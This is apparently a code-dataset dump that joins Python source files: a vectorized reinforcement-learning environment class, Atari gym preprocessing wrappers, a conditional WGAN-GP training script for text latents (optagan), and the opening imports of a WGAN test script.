:param bool update_obs_rms: Whether to update obs_rms. Default to True.
"""
def __init__(
self,
env_fns: List[Callable[[], gym.Env]],
worker_fn: Callable[[Callable[[], gym.Env]], EnvWorker],
wait_num: Optional[int] = None,
timeout: Optional[float] = None,
norm_obs: bool = False,
obs_rms: Optional[RunningMeanStd] = None,
update_obs_rms: bool = True,
seed: int = None,
) -> None:
self._env_fns = env_fns
# A VectorEnv contains a pool of EnvWorkers, which corresponds to
# interact with the given envs (one worker <-> one env).
if seed is None:
self.workers = [worker_fn(fn) for i, fn in enumerate(env_fns)]
else:
self.workers = [worker_fn(fn, seed=i+seed) for i, fn in enumerate(env_fns)]
self.worker_class = type(self.workers[0])
assert issubclass(self.worker_class, EnvWorker)
assert all([isinstance(w, self.worker_class) for w in self.workers])
self.env_num = len(env_fns)
self.wait_num = wait_num or len(env_fns)
assert 1 <= self.wait_num <= len(env_fns), \
f"wait_num should be in [1, {len(env_fns)}], but got {wait_num}"
self.timeout = timeout
assert self.timeout is None or self.timeout > 0, \
f"timeout is {timeout}, it should be positive if provided!"
self.is_async = self.wait_num != len(env_fns) or timeout is not None
self.waiting_conn: List[EnvWorker] = []
# environments in self.ready_id is actually ready
# but environments in self.waiting_id are just waiting when checked,
# and they may be ready now, but this is not known until we check it
# in the step() function
self.waiting_id: List[int] = []
# all environments are ready in the beginning
self.ready_id = list(range(self.env_num))
self.is_closed = False
# initialize observation running mean/std
self.norm_obs = norm_obs
self.update_obs_rms = update_obs_rms
self.obs_rms = RunningMeanStd() if obs_rms is None and norm_obs else obs_rms
self.__eps = np.finfo(np.float32).eps.item()
def _assert_is_not_closed(self) -> None:
assert not self.is_closed, \
f"Methods of {self.__class__.__name__} cannot be called after close."
def __len__(self) -> int:
"""Return len(self), which is the number of environments."""
return self.env_num
def __getattribute__(self, key: str) -> Any:
"""Switch the attribute getter depending on the key.
Any class who inherits ``gym.Env`` will inherit some attributes, like
``action_space``. However, we would like the attribute lookup to go straight
into the worker (in fact, this vector env's action_space is always None).
"""
if key in [
'metadata', 'reward_range', 'spec', 'action_space', 'observation_space'
]: # reserved keys in gym.Env
return self.get_env_attr(key)
else:
return super().__getattribute__(key)
def get_env_attr(
self,
key: str,
id: Optional[Union[int, List[int], np.ndarray]] = None
) -> List[Any]:
"""Get an attribute from the underlying environments.
If id is an int, retrieve the attribute denoted by key from the environment
underlying the worker at index id. The result is returned as a list with one
element. Otherwise, retrieve the attribute for all workers at indices id and
return a list that is ordered correspondingly to id.
:param str key: The key of the desired attribute.
:param id: Indice(s) of the desired worker(s). Default to None for all env_id.
:return list: The list of environment attributes.
"""
self._assert_is_not_closed()
id = self._wrap_id(id)
if self.is_async:
self._assert_id(id)
return [self.workers[j].get_env_attr(key) for j in id]
def set_env_attr(
self,
key: str,
value: Any,
id: Optional[Union[int, List[int], np.ndarray]] = None
) -> None:
"""Set an attribute in the underlying environments.
If id is an int, set the attribute denoted by key from the environment
underlying the worker at index id to value.
Otherwise, set the attribute for all workers at indices id.
:param str key: The key of the desired attribute.
:param Any value: The new value of the attribute.
:param id: Indice(s) of the desired worker(s). Default to None for all env_id.
"""
self._assert_is_not_closed()
id = self._wrap_id(id)
if self.is_async:
self._assert_id(id)
for j in id:
self.workers[j].set_env_attr(key, value)
def _wrap_id(
self,
id: Optional[Union[int, List[int], np.ndarray]] = None
) -> Union[List[int], np.ndarray]:
if id is None:
return list(range(self.env_num))
return [id] if np.isscalar(id) else id # type: ignore
def _assert_id(self, id: Union[List[int], np.ndarray]) -> None:
for i in id:
assert i not in self.waiting_id, \
f"Cannot interact with environment {i} which is stepping now."
assert i in self.ready_id, \
f"Can only interact with ready environments {self.ready_id}."
def reset(
self,
id: Optional[Union[int, List[int], np.ndarray]] = None,
**kwargs: Any,
) -> Tuple[np.ndarray, Union[dict, List[dict]]]:
"""Reset the state of some envs and return initial observations.
If id is None, reset the state of all the environments and return
initial observations, otherwise reset the specific environments with
the given id, either an int or a list.
"""
self._assert_is_not_closed()
id = self._wrap_id(id)
if self.is_async:
self._assert_id(id)
# send(None) == reset() in worker
for i in id:
self.workers[i].send(None, **kwargs)
ret_list = [self.workers[i].recv() for i in id]
assert (
isinstance(ret_list[0], (tuple, list)) and len(ret_list[0]) == 2
and isinstance(ret_list[0][1], dict)
)
obs_list = [r[0] for r in ret_list]
if isinstance(obs_list[0], tuple): # type: ignore
raise TypeError(
"Tuple observation space is not supported. ",
"Please change it to array or dict space",
)
try:
obs = np.stack(obs_list)
except ValueError: # different len(obs)
obs = np.array(obs_list, dtype=object)
infos = [r[1] for r in ret_list]
return obs, infos # type: ignore
def step(
self,
action: np.ndarray,
id: Optional[Union[int, List[int], np.ndarray]] = None,
):
"""Run one timestep of some environments' dynamics.
If id is None, run one timestep of all the environments’ dynamics;
otherwise run one timestep for some environments with given id, either
an int or a list. When the end of episode is reached, you are
responsible for calling reset(id) to reset this environment’s state.
Accept a batch of action and return a tuple (batch_obs, batch_rew,
batch_done, batch_info) in numpy format.
:param numpy.ndarray action: a batch of action provided by the agent.
:return: A tuple consisting of either:
* ``obs`` a numpy.ndarray, the agent's observation of current environments
* ``rew`` a numpy.ndarray, the amount of rewards returned after \
previous actions
* ``terminated`` a numpy.ndarray, whether these episodes have been \
terminated
* ``truncated`` a numpy.ndarray, whether these episodes have been truncated
* ``info`` a numpy.ndarray, contains auxiliary diagnostic \
information (helpful for debugging, and sometimes learning)
For the async simulation:
Provide the given action to the environments. The action sequence
should correspond to the ``id`` argument, and the ``id`` argument
should be a subset of the ``env_id`` in the last returned ``info``
(initially they are env_ids of all the environments). If action is
None, fetch unfinished step() calls instead.
"""
self._assert_is_not_closed()
id = self._wrap_id(id)
if not self.is_async:
assert len(action) == len(id)
for i, j in enumerate(id):
self.workers[j].send(action[i])
result = []
for j in id:
env_return = self.workers[j].recv()
env_return[-1]["env_id"] = j
result.append(env_return)
else:
if action is not None:
self._assert_id(id)
assert len(action) == len(id)
for act, env_id in zip(action, id):
self.workers[env_id].send(act)
self.waiting_conn.append(self.workers[env_id])
self.waiting_id.append(env_id)
self.ready_id = [x for x in self.ready_id if x not in id]
ready_conns: List[EnvWorker] = []
while not ready_conns:
ready_conns = self.worker_class.wait(
self.waiting_conn, self.wait_num, self.timeout
)
result = []
for conn in ready_conns:
waiting_index = self.waiting_conn.index(conn)
self.waiting_conn.pop(waiting_index)
env_id = self.waiting_id.pop(waiting_index)
# env_return can be (obs, reward, done, info) or
# (obs, reward, terminated, truncated, info)
env_return = conn.recv()
env_return[-1]["env_id"] = env_id # Add `env_id` to info
result.append(env_return)
self.ready_id.append(env_id)
obs_list, rew_list, term_list, trunc_list, info_list = tuple(zip(*result))
try:
obs_stack = np.stack(obs_list)
except ValueError: # different len(obs)
obs_stack = np.array(obs_list, dtype=object)
return (
obs_stack,
np.stack(rew_list),
np.stack(term_list),
np.stack(trunc_list),
np.stack(info_list),
)
def seed(
self,
seed: Optional[Union[int, List[int]]] = None
) -> List[Optional[List[int]]]:
"""Set the seed for all environments.
Accept ``None``, an int (which will extend ``i`` to
``[i, i + 1, i + 2, ...]``) or a list.
:return: The list of seeds used in this env's random number generators.
The first value in the list should be the "main" seed, or the value
which a reproducer pass to "seed".
"""
self._assert_is_not_closed()
seed_list: Union[List[None], List[int]]
if seed is None:
seed_list = [seed] * self.env_num
elif isinstance(seed, int):
seed_list = [seed + i for i in range(self.env_num)]
else:
seed_list = seed
return [w.seed(s) for w, s in zip(self.workers, seed_list)]
def render(self, **kwargs: Any) -> List[Any]:
"""Render all of the environments."""
self._assert_is_not_closed()
if self.is_async and len(self.waiting_id) > 0:
raise RuntimeError(
f"Environments {self.waiting_id} are still stepping, cannot "
"render them now."
)
return [w.render(**kwargs) for w in self.workers]
def close(self) -> None:
"""Close all of the environments.
This function will be called only once (if not, it will be called during
garbage collected). This way, ``close`` of all workers can be assured.
"""
self._assert_is_not_closed()
for w in self.workers:
w.close()
self.is_closed = True
def normalize_obs(self, obs: np.ndarray) -> np.ndarray:
"""Normalize observations by statistics in obs_rms."""
if self.obs_rms and self.norm_obs:
clip_max = 10.0 # this magic number is from openai baselines
# see baselines/common/vec_env/vec_normalize.py#L10
obs = (obs - self.obs_rms.mean) / np.sqrt(self.obs_rms.var + self.__eps)
obs = np.clip(obs, -clip_max, clip_max)
return obs
class DummyVectorEnv(BaseVectorEnv):
"""Dummy vectorized environment wrapper, implemented in for-loop.
"""
def __init__(self, env_fns: List[Callable[[], gym.Env]], **kwargs: Any) -> None:
super().__init__(env_fns, DummyEnvWorker, **kwargs)
| [] |
2024-01-10 | MegEngine/MegRL | baserl~data~env~wrapper.py | # https://github.com/thu-ml/tianshou/blob/master/examples/atari/atari_wrapper.py
# Borrow a lot from openai baselines:
# https://github.com/openai/baselines/blob/master/baselines/common/atari_wrappers.py
import warnings
from collections import deque
import cv2
import gymnasium as gym
import numpy as np
def _parse_reset_result(reset_result):
contains_info = (
isinstance(reset_result, tuple) and len(reset_result) == 2
and isinstance(reset_result[1], dict)
)
if contains_info:
return reset_result[0], reset_result[1], contains_info
return reset_result, {}, contains_info
class NoopResetEnv(gym.Wrapper):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
:param gym.Env env: the environment to wrap.
:param int noop_max: the maximum value of no-ops to run.
"""
def __init__(self, env, noop_max=30):
super().__init__(env)
self.noop_max = noop_max
self.noop_action = 0
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self, **kwargs):
_, info, return_info = _parse_reset_result(self.env.reset(**kwargs))
if hasattr(self.unwrapped.np_random, "integers"):
noops = self.unwrapped.np_random.integers(1, self.noop_max + 1)
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1)
for _ in range(noops):
step_result = self.env.step(self.noop_action)
if len(step_result) == 4:
obs, rew, done, info = step_result
else:
obs, rew, term, trunc, info = step_result
done = term or trunc
if done:
obs, info, _ = _parse_reset_result(self.env.reset())
if return_info:
return obs, info
return obs
class MaxAndSkipEnv(gym.Wrapper):
"""Return only every `skip`-th frame (frameskipping) using most recent raw
observations (for max pooling across time steps)
:param gym.Env env: the environment to wrap.
:param int skip: number of `skip`-th frame.
"""
def __init__(self, env, skip=4):
super().__init__(env)
self._skip = skip
def step(self, action):
"""Step the environment with the given action. Repeat action, sum
reward, and max over last observations.
"""
obs_list, total_reward = [], 0.
new_step_api = False
for _ in range(self._skip):
step_result = self.env.step(action)
if len(step_result) == 4:
obs, reward, done, info = step_result
else:
obs, reward, term, trunc, info = step_result
done = term or trunc
new_step_api = True
obs_list.append(obs)
total_reward += reward
if done:
break
max_frame = np.max(obs_list[-2:], axis=0)
if new_step_api:
return max_frame, total_reward, term, trunc, info
return max_frame, total_reward, done, info
class EpisodicLifeEnv(gym.Wrapper):
"""Make end-of-life == end-of-episode, but only reset on true game over. It
helps the value estimation.
:param gym.Env env: the environment to wrap.
"""
def __init__(self, env):
super().__init__(env)
self.lives = 0
self.was_real_done = True
self._return_info = False
def step(self, action):
step_result = self.env.step(action)
if len(step_result) == 4:
obs, reward, done, info = step_result
new_step_api = False
else:
obs, reward, term, trunc, info = step_result
done = term or trunc
new_step_api = True
self.was_real_done = done
# check current lives, make loss of life terminal, then update lives to
# handle bonus lives
lives = self.env.unwrapped.ale.lives()
if 0 < lives < self.lives:
# for Qbert sometimes we stay in lives == 0 condition for a few
# frames, so its important to keep lives > 0, so that we only reset
# once the environment is actually done.
done = True
term = True
self.lives = lives
if new_step_api:
return obs, reward, term, trunc, info
return obs, reward, done, info
def reset(self, **kwargs):
"""Calls the Gym environment reset, only when lives are exhausted. This
way all states are still reachable even though lives are episodic, and
the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs, info, self._return_info = _parse_reset_result(
self.env.reset(**kwargs)
)
else:
# no-op step to advance from terminal/lost life state
step_result = self.env.step(0)
obs, info = step_result[0], step_result[-1]
self.lives = self.env.unwrapped.ale.lives()
if self._return_info:
return obs, info
else:
return obs
class FireResetEnv(gym.Wrapper):
"""Take action on reset for environments that are fixed until firing.
Related discussion: https://github.com/openai/baselines/issues/240
:param gym.Env env: the environment to wrap.
"""
def __init__(self, env):
super().__init__(env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def reset(self, **kwargs):
_, _, return_info = _parse_reset_result(self.env.reset(**kwargs))
obs = self.env.step(1)[0]
return (obs, {}) if return_info else obs
class WarpFrame(gym.ObservationWrapper):
"""Warp frames to 84x84 as done in the Nature paper and later work.
:param gym.Env env: the environment to wrap.
"""
def __init__(self, env):
super().__init__(env)
self.size = 84
self.observation_space = gym.spaces.Box(
low=np.min(env.observation_space.low),
high=np.max(env.observation_space.high),
shape=(self.size, self.size),
dtype=env.observation_space.dtype
)
def observation(self, frame):
"""returns the current observation from a frame"""
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
return cv2.resize(frame, (self.size, self.size), interpolation=cv2.INTER_AREA)
class ScaledFloatFrame(gym.ObservationWrapper):
"""Normalize observations to 0~1.
:param gym.Env env: the environment to wrap.
"""
def __init__(self, env):
super().__init__(env)
low = np.min(env.observation_space.low)
high = np.max(env.observation_space.high)
self.bias = low
self.scale = high - low
self.observation_space = gym.spaces.Box(
low=0., high=1., shape=env.observation_space.shape, dtype=np.float32
)
def observation(self, observation):
return (observation - self.bias) / self.scale
class ClipRewardEnv(gym.RewardWrapper):
"""clips the reward to {+1, 0, -1} by its sign.
:param gym.Env env: the environment to wrap.
"""
def __init__(self, env):
super().__init__(env)
self.reward_range = (-1, 1)
def reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign. Note: np.sign(0) == 0."""
return np.sign(reward)
class FrameStack(gym.Wrapper):
"""Stack n_frames last frames.
:param gym.Env env: the environment to wrap.
:param int n_frames: the number of frames to stack.
"""
def __init__(self, env, n_frames):
super().__init__(env)
self.n_frames = n_frames
self.frames = deque([], maxlen=n_frames)
shape = (n_frames, ) + env.observation_space.shape
self.observation_space = gym.spaces.Box(
low=np.min(env.observation_space.low),
high=np.max(env.observation_space.high),
shape=shape,
dtype=env.observation_space.dtype
)
def reset(self, **kwargs):
obs, info, return_info = _parse_reset_result(self.env.reset(**kwargs))
for _ in range(self.n_frames):
self.frames.append(obs)
return (self._get_ob(), info) if return_info else self._get_ob()
def step(self, action):
step_result = self.env.step(action)
if len(step_result) == 4:
obs, reward, done, info = step_result
new_step_api = False
else:
obs, reward, term, trunc, info = step_result
new_step_api = True
self.frames.append(obs)
if new_step_api:
return self._get_ob(), reward, term, trunc, info
return self._get_ob(), reward, done, info
def _get_ob(self):
# the original wrapper use `LazyFrames` but since we use np buffer,
# it has no effect
return np.stack(self.frames, axis=0)
def wrap_deepmind(
env_id,
episode_life=True,
clip_rewards=True,
frame_stack=4,
scale=False,
warp_frame=True
):
"""Configure environment for DeepMind-style Atari. The observation is
channel-first: (c, h, w) instead of (h, w, c).
:param str env_id: the atari environment id.
:param bool episode_life: wrap the episode life wrapper.
:param bool clip_rewards: wrap the reward clipping wrapper.
:param int frame_stack: wrap the frame stacking wrapper.
:param bool scale: wrap the scaling observation wrapper.
:param bool warp_frame: wrap the grayscale + resize observation wrapper.
:return: the wrapped atari environment.
"""
assert 'NoFrameskip' in env_id
env = gym.make(env_id, render_mode="rgb_array")
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
if episode_life:
env = EpisodicLifeEnv(env)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
if warp_frame:
env = WarpFrame(env)
if scale:
env = ScaledFloatFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
if frame_stack:
env = FrameStack(env, frame_stack)
return env
| [] |
2024-01-10 | Egojr/optagan | optagan~cond_wgan_gp_train.py | from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import logging
import torch
import torch.nn as nn
import torch.optim as optim
import torch.autograd as autograd
from torch.autograd import Variable
import numpy as np
from modules.gan import cond_Generator, cond_Critic, Classifier
import glob
import os
import pickle
import random
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm, trange
from func import GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig, BertConfig
from func import GPT2LMHeadModel, GPT2Tokenizer, GPT2ForLatentConnector
from func import OpenAIGPTLMHeadModel, OpenAIGPTTokenizer
from func import XLNetLMHeadModel, XLNetTokenizer
from func import TransfoXLLMHeadModel, TransfoXLTokenizer
from func import BertForLatentConnector, BertTokenizer
from collections import defaultdict
from utils import (TextDataset_Split, TextDataset_2Tokenizers, BucketingDataLoader, BucketingDataLoaderYelp)
import pdb
from modules.utils import (calc_blue_parallel_func, pad_seq, rollout, rollout_test)
from transformers.modeling_utils import top_k_top_p_filtering
MAX_LENGTH = int(10000) # Hardcoded max length to avoid infinite loop
ALL_MODELS = sum((tuple(conf.pretrained_config_archive_map.keys()) for conf in (GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig)), ())
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
MODEL_CLASSES = {
'gpt2': (GPT2Config, GPT2ForLatentConnector, GPT2Tokenizer),
'bert': (BertConfig, BertForLatentConnector, BertTokenizer)
}
def load_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
dataset = TextDataset_2Tokenizers(tokenizer, args, args.train_data_file, block_size=args.block_size)
else:
dataset = TextDataset_Split(tokenizer, args, args.train_data_file, block_size=args.block_size)
return dataset
def build_dataload_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
args.batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
file_path=args.train_data_file
dataloader = BucketingDataLoaderYelp(file_path, args.batch_size, args.max_seq_length, tokenizer, args, bucket=100, shuffle=True)
else:
pass
return dataloader
def compute_grad_penalty(critic, real_data, fake_data, label): #
B = real_data.size(0)
alpha = torch.FloatTensor(np.random.random((B, 1)))
if args.cuda:
alpha = alpha.cuda()
sample = alpha*real_data + (1-alpha)*fake_data
sample.requires_grad_(True)
score = critic(sample, label) #
outputs = torch.FloatTensor(B, 1).fill_(1.0) # args.latent_size
outputs.requires_grad_(False)
if args.cuda:
outputs = outputs.cuda()
grads = autograd.grad(
outputs=score,
inputs=sample,
grad_outputs=outputs,
create_graph=True,
retain_graph=True,
only_inputs=True
)[0]
grad_penalty = ((grads.norm(2, dim=1) - 1.) ** 2).mean()
return grad_penalty
def train(epoch):
model_encoder.eval()
model_decoder.eval()
generator.train()
critic.train()
classifier.train()
cl_train_loss = 0.
c_train_loss = 0.
g_train_loss = 0.
g_batches = 0
for i, x in enumerate(train_loader):
label = x[3]
x = x[0]
if args.cuda:
x = x.cuda()
# Generate noise and labels
gen_labels = (torch.rand(args.per_gpu_train_batch_size, 1) * args.n_classes).type(torch.LongTensor)
B = args.per_gpu_train_batch_size
c_optimizer.zero_grad()
noise = torch.from_numpy(np.random.normal(0, 1, (B,
args.latent_size))).float()
if args.cuda:
noise = noise.cuda()
label = label.cuda()
gen_labels = gen_labels.cuda()
# Get original text latent embeddings
with torch.no_grad():
pooled_hidden_fea = model_encoder(x, attention_mask=(x > 0).float())[1] # Paolo
mean, logvar = model_encoder.linear(pooled_hidden_fea).chunk(2, -1) # Paolo
z_real = mean.squeeze(1)
# Evaluate and get losses
z_fake = generator(noise, gen_labels)
real_score = critic(z_real, label)
fake_score = critic(z_fake, gen_labels)
grad_penalty = compute_grad_penalty(critic, z_real.data, z_fake.data, label.data) #
pred_class = classifier(z_real)
cl_lab = label.clone().squeeze_()
# Classifier loss
cl_optimizer.zero_grad()
cl_loss = nn.CrossEntropyLoss()(pred_class.to(args.device), cl_lab)
cl_train_loss += cl_loss.item()
cl_loss.backward()
cl_optimizer.step()
# Critic loss
c_loss = -torch.mean(real_score) + torch.mean(fake_score) + \
args.gp_lambda*grad_penalty
c_train_loss += c_loss.item()
c_loss.backward()
c_optimizer.step()
# train generator
if i % args.n_critic == 0:
g_batches += 1
g_optimizer.zero_grad()
fake_score = critic(generator(noise, gen_labels), gen_labels) # #
pred_gen_class = classifier(generator(noise, gen_labels)).to(args.device)
cl_gen_lab = gen_labels.clone().squeeze_()
g_cl_loss = nn.CrossEntropyLoss()(pred_gen_class, cl_gen_lab)
g_loss = -torch.mean(fake_score) + g_cl_loss * 10
g_train_loss += g_loss.item()
g_loss.backward()
g_optimizer.step()
if args.interval > 0 and i % args.interval == 0:
logger.info('Epoch: {} | Batch: {}/{} ({:.0f}%) | G Loss: {:.6f} | C Loss: {:.6f} | Cl Loss: {:.6f}'.format(
epoch, args.batch_size*i, len(train_loader.dataset),
100.*(args.batch_size*i)/len(train_loader.dataset),
g_loss.item(), c_loss.item(), cl_loss.item()
))
test_lab = (torch.rand(1, 1) * args.n_classes).type(torch.LongTensor).to(args.device)
test_noise = torch.Tensor(np.random.normal(0, 1, (1, args.latent_size))).to(args.device)
test_new_z = generator(test_noise, test_lab).data
# create new sent
test_z = rollout_test(model_decoder, test_new_z, tokenizer_decoder, args.max_seq_length, 1, 0, 1)
logger.info("Label: {} | Text: {}".format(test_lab.item(), test_z))
g_train_loss /= g_batches
c_train_loss /= len(train_loader)
logger.info('* (Train) Epoch: {} | G Loss: {:.4f} | C Loss: {:.4f}'.format(
epoch, g_train_loss, c_train_loss
))
return (g_train_loss, c_train_loss)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--epochs', type=int, default=15)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gp_lambda', type=int, default=10)
parser.add_argument('--n_critic', type=int, default=5, help="Number of critic updates before each generator update")
parser.add_argument('--n_layers', type=int, default=20, help="Number of layers of generator and critic")
parser.add_argument('--block_dim', type=int, default=100)
parser.add_argument('--interval', type=int, default=10, help="Steps before logging output")
parser.add_argument('--n_classes', type=int, default=4, help="Overall number of classes")
parser.add_argument('--cuda', type=bool, default=torch.cuda.is_available())
# Optimus parameters
parser.add_argument("--train_data_file", default=None, type=str, required=True,
help="The input training data file (a text file).")
parser.add_argument("--valid_data_file", default=None, type=str, required=True,
help="The input validation data file (a text file).")
parser.add_argument("--checkpoint_dir", default=None, type=str, required=True,
help="The directory where checkpoints are saved.")
parser.add_argument('--generator_dir', default=None, type=str, help="Directory where GAN models are saved")
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--dataset", default='Snli', type=str, help="The dataset.")
parser.add_argument("--latent_size", default=32, type=int, help="Latent space dimension.")
## Encoder options
parser.add_argument("--encoder_model_type", default="bert", type=str,
help="The encoder model architecture to be fine-tuned.")
parser.add_argument("--encoder_model_name_or_path", default="bert-base-cased", type=str,
help="The encoder model checkpoint for weights initialization.")
parser.add_argument("--encoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--encoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
## Decoder options
parser.add_argument("--decoder_model_type", default="gpt2", type=str,
help="The decoder model architecture to be fine-tuned.")
parser.add_argument("--decoder_model_name_or_path", default="bert-base-cased", type=str,
help="The decoder model checkpoint for weights initialization.")
parser.add_argument("--decoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--decoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
parser.add_argument("--per_gpu_train_batch_size", default=1, type=int,
help="Batch size per GPU/CPU for training.")
parser.add_argument("--max_seq_length", default=512, type=int,
help="Optional input sequence length before tokenization. The sequence will be dropped if it is longer the max_seq_length")
## Variational auto-encoder(check this)
parser.add_argument("--prompt", type=str, default="")
parser.add_argument("--padding_text", type=str, default="")
parser.add_argument("--length", type=int, default=20)
parser.add_argument("--block_size", default=-1, type=int,
help="Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens).")
parser.add_argument("--do_lower_case", action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--use_philly", action='store_true',
help="Use Philly for computing.")
parser.add_argument('--gloabl_step_eval', type=int, default=661,
help="Evaluate the results at the given global step")
# Load a trained Encoder model and vocabulary that you have fine-tuned
args = parser.parse_args()
global_step = args.gloabl_step_eval
torch.backends.cudnn.deterministic = True
args.device = torch.device("cuda" if args.cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
args.encoder_model_type = args.encoder_model_type.lower()
args.decoder_model_type = args.decoder_model_type.lower()
output_encoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-encoder-{}'.format(global_step))
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
checkpoints = [ [output_encoder_dir, output_decoder_dir] ]
# Load a trained Encoder model and vocabulary that you have fine-tuned
encoder_config_class, encoder_model_class, encoder_tokenizer_class = MODEL_CLASSES[args.encoder_model_type]
model_encoder = encoder_model_class.from_pretrained(output_encoder_dir, latent_size=args.latent_size)
tokenizer_encoder = encoder_tokenizer_class.from_pretrained(args.encoder_tokenizer_name if args.encoder_tokenizer_name else args.encoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_encoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_encoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_encoder.max_len_single_sentence)
# Load a trained Decoder model and vocabulary that you have fine-tuned
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES[args.decoder_model_type]
model_decoder = decoder_model_class.from_pretrained(output_decoder_dir, latent_size=args.latent_size)
tokenizer_decoder = decoder_tokenizer_class.from_pretrained(args.decoder_tokenizer_name if args.decoder_tokenizer_name else args.decoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_decoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_decoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_decoder.max_len_single_sentence)
# Chunyuan: Add Padding token to GPT2
special_tokens_dict = {'pad_token': '<PAD>', 'bos_token': '<BOS>', 'eos_token': '<EOS>'}
num_added_toks = tokenizer_decoder.add_special_tokens(special_tokens_dict)
logger.info('We have added {} tokens to GPT2'.format(num_added_toks))
model_decoder.resize_token_embeddings(len(tokenizer_decoder)) # Notice: resize_token_embeddings expect to receive the full size of the new vocabulary, i.e. the length of the tokenizer.
assert tokenizer_decoder.pad_token == '<PAD>'
train_loader = build_dataload_and_cache_examples(args, [tokenizer_encoder, tokenizer_decoder])
generator = cond_Generator(args.n_layers, args.block_dim, args.latent_size, args.n_classes)
critic = cond_Critic(args.n_layers, args.block_dim, args.latent_size, args.n_classes)
classifier = Classifier(args.latent_size, args.block_dim, args.n_classes)
if args.generator_dir!=None:
generator.load_state_dict(torch.load(args.generator_dir+'/generator_'+str(args.gloabl_step_eval)+'.th'))
critic.load_state_dict(torch.load(args.generator_dir+'/critic_'+str(args.gloabl_step_eval)+'.th'))
classifier.load_state_dict(torch.load(args.generator_dir+'/classifier_'+str(args.gloabl_step_eval)+'.th'))
cl_optimizer = optim.Adam(classifier.parameters(), lr=args.lr, betas=(0.5, 0.999))
g_optimizer = optim.Adam(generator.parameters(), lr=args.lr, betas=(0.5, 0.999))
c_optimizer = optim.Adam(critic.parameters(), lr=args.lr, betas=(0.5, 0.999))
if args.cuda:
generator = generator.cuda()
critic = critic.cuda()
classifier = classifier.cuda()
logger.info('G Parameters:{}'.format(sum([p.numel() for p in generator.parameters() if \
p.requires_grad])))
logger.info('C Parameters:{}'.format(sum([p.numel() for p in critic.parameters() if \
p.requires_grad])))
best_bleu = 0
reference = list()
with(open(args.valid_data_file,"r")) as valid:
for sents in valid:
reference.append(sents.replace("\n", ""))
for epoch in range(1, args.epochs + 1):
g_loss, c_loss = train(epoch)
data_test = list()
test_lab = torch.LongTensor([0]*100 + [1]*100 + [2]*100 + [3]*100 + [4]*100).to(args.device)
for i in range(5):
test_noise = torch.Tensor(np.random.normal(0, 1, (100, args.latent_size))).to(args.device)
test_z = generator(test_noise, test_lab[100*i:100*(i+1)]).data
new_sent = rollout_test(model_decoder, test_z, tokenizer_decoder, args.max_seq_length, 100, 0, 1)
data_test.extend(new_sent)
p_reference = random.sample(reference, 500)
data_test = [str(lab)+" "+str(sen) for lab,sen in zip(test_lab.tolist(), data_test)]
bleu = calc_blue_parallel_func(p_reference, data_test, 2, 500, True)
b_bleu = calc_blue_parallel_func(data_test, p_reference, 2, 500, True)
logger.info("Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}".format(bleu, b_bleu))
if (bleu+b_bleu) > best_bleu:
best_bleu = bleu + b_bleu
logger.info('* Saving. Best Score:{:0.3f} | Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}'.format(best_bleu, bleu, b_bleu))
torch.save(generator.state_dict(), args.output_dir+'/generator_'+str(args.gloabl_step_eval)+'.th')
torch.save(critic.state_dict(), args.output_dir+'/critic_'+str(args.gloabl_step_eval)+'.th')
torch.save(classifier.state_dict(), args.output_dir+'/classifier_'+str(args.gloabl_step_eval)+'.th') | [] |
2024-01-10 | Egojr/optagan | optagan~wgan_test.py | from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import logging
import torch
import torch.nn as nn
import numpy as np
from modules.gan import Generator
import glob
import os
import pickle
import random
